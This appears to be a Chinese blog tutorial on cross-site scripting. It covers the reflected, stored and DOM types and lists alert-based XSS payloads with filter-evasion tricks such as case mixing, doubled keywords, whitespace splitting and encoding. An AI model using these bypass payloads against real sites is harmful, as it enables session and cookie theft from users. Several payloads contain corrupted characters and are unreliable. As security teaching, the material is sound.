本章目的
普及XSS漏洞原理和分类,以及XSSspayload构造以及变形
基础概念
XSS漏洞概述
XSS被称为跨站脚本攻击(Cross-site scripting),由于和CSS(Cascading Style Sheets)重名,所以改为XSS。XSS主要基于javascript语言完成恶意的攻击行为,因为javascript可以非常灵活的操作html、css和浏览器。
XSS简介
XSS就是指通过利用网页开发时留下的漏洞(由于Web应用程序对用户的输入过滤不足),巧妙的将恶意代码注入到网页中,使用户浏览器加载并执行攻击者制造的恶意代码,以达到攻击的效果。这些恶意代码通常是JavaScript,但实际上也可以包括Java、VBScript、ActiveX、Flash或者普通的HTML。当用户访问被XSS注入的网页,XSS代码就会被提取出来。用户浏览器就会解析这段XSS代码,也就是说用户被攻击了。用户最简单的动作就是使用浏览器上网,并且浏览器中有javascript解释器,可以解析javascript,然而由于浏览器并不具有人格,不会判断代码是否恶意,只要代码符合语法规则,浏览器就会解析这段XSS代码。简单来说,XSS就是通过攻击者精心构造的JS代码注入到网页中,并由浏览器解释运行这段JS代码,以达到恶意攻击浏览器的效果。XSS攻击的对象是用户浏览器,属于被动攻击。因此XSS攻击涉及到三个角色:攻击者、用户浏览器、服务器
XSS危害
盗取各种用户账号
窃取用户Cookie资料,冒充用户身份进入网站
劫持用户会话,执行任意操作
刷流量,执行弹窗广告
传播端虫病毒
攻击者能在一定限度内记录用户的键盘输入
从上述可知,XSS属于客户端攻击,受害者最终是用户,不要以为受害者是用户就认为跟自己的网站、服务器安全就没有关系。不要忘记,网站的管理员也是用户之一!因为管理员要比普通用户权限大的多,可以利用当其跳板实施攻击。微博、留言板、聊天室等等收集用户输入的地方,都有遭受XSS的风险。只要对用户的输入没有进行严格的过滤,就有可能遭受XSS攻击。
实施XSS攻击需要具备的两个条件:
需要向Web页面注入精心构造的恶意代码
对用户的输入没有做过滤,恶意代码能够被浏览器成功的执行
XSS验证
<script>alert(/xss/)</script> 常用
<script>confirm('xss')</scripts>
<script>prompt("xss")</script>
XSS验证
在测试页面中提交上述的代码,浏览器执行后就能看到弹框的操作,弹窗的目的是验证JS代码是否被执行。我们发现,提交的代码<script>alert('xss')</script>,被当做字符串输出在HTML页面中,浏览器会根据<script>标签识别为JS代码,并会执行它,执行弹窗操作。也就是我们可以执行JS代码,验证了XSS漏洞的存在性。
XSS漏洞分类
XSS根据其特性和利用手法的不同,主要分为三大类型:
反射型XSS
通常由黑客发送恶意URL给用户,进而控制服务器
特点
·非持久性
·参数型脚本
·反射型XSS的JS代码在Web应用的参数(变量)中,如搜索框等地方数据流量走向:浏览器->后端->浏览器
反射型XSS
反射型XSS又称为非持久型XSS,是现在最容易出现的一种XSS漏洞。用户在请求某条URL地址的时候,会携带一部分数据。当客户端进行访问某条链接时,攻击者可以将恶意代码植入到URL,如果服务端未对URL携带的参数做判断或者过滤处理,直接返回响应页面,那么XSS攻击代码就会一起被传输到用户的浏览器,从而触发反射型XSS。
比如,当用户进行搜索时,返回结果通常会包括用户原始的搜索内容,如果攻击者精心构造包含XSS恶意代码的链接,诱导用户点击并成功执行后,用户的信息就可以被窃取,甚至可以模拟用户进行一些操作。
存储型XSS
通常由黑客发植入XSS进而控制服务器,使其送恶意URL给用户
特点
·持久性跨站脚本
·持久性体现在JS代码不是在某个参数(变量)中,而是写进数据库或文件等可以永
久保存数据的介质中,如留言板等地方
数据流量走向:浏览器->后端->数据库->后端->浏览器
存储型XSS
存储型XSS又叫持久型XSS。一般而言,它是三种XSS里危害最大的一种。此类型的XSS漏洞是由于恶意攻击代码被持久化保存到服务器上,然后被显示到HTML页面之中。这类漏洞经常出现在用户评论的页面,攻击者精心构造XSS代码,保存到数据库中,当其他用户再次访问这个页面时,就会触发并执行恶意的XSS代码,从而窃取用户的敏感信息。
DOM型XSS
通常由黑客发送恶意URL给用户DOM型XSS
特点
·非持久性
数据流量走向:URL->浏览器
节点
文档是由节点构成的集合,在DOM里存在许多不同类型的节点,主要分为以下三种;
·元素节点
如购物页面,<body>、<p>、<ul>之类的元素在文档中的布局形成
了文档的结构,它们即是元素节点。
·文本节点
文档通常会包含一些内容,这些内容多数由文本提供,如前面例子中,<p>包含着
文本“欢迎购买”,它就是一个文本节点。
·属性节点
元素或多或少都有一些属性,属性用于对元素做出更具体的描述。
DOM型XSS漏洞是基于文档对象模型(DocumentObjectModel)的一种漏洞。这种XSS与反射型XSS、持久型XSS在原理上有本质区别,它的攻击代码并不需要服务器解析响应,触发XSS靠的是浏览器端的DOM解析。客户端上的JavaScript脚本可以访问浏览器的DOM并修改页面的内容,不依赖服务器的数据,直接从浏览器端获取数据并执行。在客户端直接输出DOM内容的时候极易触发DOM型XSS漏洞,如document.getElementByld("x").innerHTML、 document.write等。
XSSpayload构造以及变形
XSS payload构造
利用【<>】构造HTML标签和<script></script:>标签
<h1 style="color:green;">XSS</h1>
<script>alert(/xss/)</script>
利用HTML标签的属性值(伪协议)
<a href="javascript:alert(/xss/)">touch me !</a>
<img src="javascript:alert('xss')">(此标签需要在IE6下测试)
利用事件
事件种类
·windows事件 对windows对象触发的事件
·Form事件 HTML表单内的动作触发事件
·Keyboard事件 键盘按键
·Mouse事件 由鼠标或类似用户动作触发的事件
·Media事件 由多媒体触发的事件
利用事件
<img src='./smile.jpg'οnmοuseοver='alert(/xss/)'>
<input type="text"οnclick="alert(/xss/)">
利用CSS
可以利用CSS(层叠样式脚本)
触发XSS。但是这种方法比较古老,基本上不适合现在
主要的浏览器,但是从学习的角度,我们需要了解这种类型的XSS,以下代码均在E6下测试:
行内样式
<div style="background-image:url(javascript:alert(/xss/))">
页内样式
<style>Body(background-image:url(javascript:alert(/xss/))}</style>
外部样式
<link rel="stylesheet"type="text/css"href="./xss.css">
expression
<div style="width:expression(alert(/xss/))">
大小写
<iMg sRc='#'Onerror="alert(/xss/)"/>
<a hREf="javaScript:alert(/xss/)">click me</a>
双写关键字
<scrscriptipt>alert(/xss/)</scrscriptipt>
引号
如果在HTML标签中,可以不用引号;如果在js中,可以用反引号代替单双引号
<img src="#"οnerrοr="alert(/xss/)"/>
<img src='#'οnerrοr='alert(/xss/)'/>
57
<img src=#οnerrοr=alert(/xss/)/>
<img src="#οnerrοr=alert('xss')/
<img src="#"οnerrοr=alert'xss'/>(代替括号)
【/】代替空格
<img/src='#'/οnerrοr='alert/'(xss/)'/>
Tab与回车
在一些位置添加Tab(水平制表符)和回车符来绕过关键字检测
<img src='#'onerror
='alert(/xss/)'/>
<a href="j
avascript:alert(/xss/)">click me!</a>
<A href="j
avascript:alert(/xss/)">click me!</a>
XSS payloadi变形
编码
HTML实体编码
a 97 a a
<a href="javascript:alert(/xss/)">click me!</a>
URL编码
%3Cscript%3Ealert(/xss/)%3C/script%3E
345
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
